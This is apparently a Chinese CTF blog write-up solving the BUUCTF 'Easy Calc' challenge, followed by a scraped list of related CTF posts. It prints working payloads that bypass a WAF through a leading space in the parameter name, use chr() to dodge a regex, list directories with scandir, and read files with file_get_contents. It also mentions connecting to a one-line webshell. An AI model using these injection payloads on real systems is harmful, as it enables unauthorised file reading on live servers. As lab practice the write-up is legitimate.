[极客大挑战 2019]Knife [RoarCTF 2019]Easy Calc
一句话直接连。
一个计算器随便试一试,当输入字母时会报错。查看网页源码,在script中发现了运行计算器的php文件:calc.php,但是也有一句很重要的注释
<!--I've set up WAF to ensure security.-->
php的正则表达式中并没有过滤字母的条件,所以我们输入字母被过滤是因为WAF,接下来是参考网上的wp自己的理解
可以在calc.php传参
? num=a
php会输出一个值a,说明已经绕过了WAF。这里使用的是WAF和php解析方法不一样,WAF解析到空格’ '会直接过滤掉,这样WAF认为传入的就是一个空值,并不会识别num,但是php解析的时候会把空格去掉,这样就能get到num的值。
接下来绕过正则就可以使用char()的方式使用ascii码转。空格被过滤但是想使用php输出可以使用var_dump()
查看根目录下文件,可以使用scandir()遍历文件夹,其中char(47)------> ‘/’ :
? num=1;var_dump(scandir(chr(47)))
找到了疑似flag文件:f1agg,使用file_get_contents()读取文件
?%20num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
[极客大挑战 2019]Knife [RoarCTF 2019]Easy Calc相关推荐
- BUUCTF Web [GXYCTF2019]Ping Ping Ping [极客大挑战 2019]LoveSQL [极客大挑战 2019]Knife [极客大挑战 2019]Http
目录 [GXYCTF2019]Ping Ping Ping [极客大挑战 2019]LoveSQL [极客大挑战 2019]Knife [极客大挑战 2019]Http [GXYCTF2019]Pin ...
- BUUCTF——web([GXYCTF2019]Ping Ping Ping、[极客大挑战 2019]Knife、[极客大挑战 2019]Http)
BUUCTF-web [GXYCTF2019]Ping Ping Ping 做题思路 [极客大挑战 2019]Knife 做题思路 [极客大挑战 2019]Http 做题思路 [GXYCTF2019] ...
- [极客大挑战 2019]Knife --- [极客大挑战 2019]Http
[极客大挑战 2019]Knife 一句话木马,POST传参,没啥好说的, 使用菜刀或者其他工具连接上 找一下flag在哪 结束!!! [极客大挑战 2019]Http 一开始的页面中没看到有用的信息 ...
- [BUUCTF-pwn]——[极客大挑战 2019]Not Bad(ORW)(内涵peak小知识)
[BUUCTF-pwn]--[极客大挑战 2019]Not Bad 又是一道收获满满的题目. peak小知识 seccomp: seccomp是一种内核中的安全机制,正常情况下,程序可以使用所有的sy ...
- 极客大挑战2020_CTF-Web-[极客大挑战 2019]HardSQL
CTF-Web-[极客大挑战 2019]HardSQL 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得 ...
- BUUCTF Web [极客大挑战 2019]Havefun
「作者主页」:士别三日wyx 此文章已录入专栏<网络攻防>,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之 ...
- BUUCTF-web [极客大挑战 2019]PHP1 之 反序列化漏洞
PHP反序列化漏洞 一,什么是序列与反序列 序列就是把数据转成可逆的数据结构,目的是方便数据的储存和传输,反序列就是将数据逆转成原来的状态,序列就是拆数据,使得传输或储存更容易的过程,反序列就是重新拼 ...
- BUUCTF Web 极客大挑战 2019 EasySQL
BUUCTF Web 极客大挑战 2019 EasySQL 文章目录 BUUCTF Web 极客大挑战 2019 EasySQL 1,输入万能密码: 2,输入万能账号 首先有点常识: 正常SQL语句这 ...
- [极客大挑战 2019]FinalSQL
[极客大挑战 2019]FinalSQL 依次点击5个页面 到最后一个页面发现提示尝试第6个页面,观察到url中的id,输入6得到 有参数,尝试单引号 提示error 那么应该存在sql注入,尝试永真 ...
- 极客大挑战2019php,[极客大挑战 2019]PHP
标签:spl payload sorry min private lob audio ascii sel 题目上说有备份的好习惯,扫描目录得到www.zip 几个重要p ...
最新文章
- Navicat for Oracle
- android快速充电实现_用一个快充头实现苹果安卓同时快充,实在太赞了!
- PAT甲级题目翻译+答案 AcWing(图论)
- dns服务器在电脑上有什么作用,DNS服务器是什么 DNS服务器的作用有哪些【详解】...
- Java 获取向量中的最大值
- linux内核那些事之Memory protection keys(硬件原理)
- oneplus 驱动_OnePlus投放CyanogenMod,Raspberry Pi 2驱动的机器人等
- arcgis js api前端完成面积测算
- Spark Shuffle详解剖析
- jni 调用sock_raw -- 端口扫描
- 谷粒商城:04. 逆向工程完善微服务系统
- OSPF相关配置案例!
- python绘制正态分布图_在python中画正态分布图像的实例
- Invocation failed Unexpected end of file from server
- 眼光独到便能发现刷脸支付带来的商机
- Pytorch使用CPU
- 单片机c语言编写音乐播放器,51单片机c语言编写电子琴+音乐播放器.doc.doc
- AtCoder Beginner Contest 171 D Replacing 桶排序+及时更新数据
- uni小程序底线(没有更多)
- JMokit中的@Mocked与@Injectable区别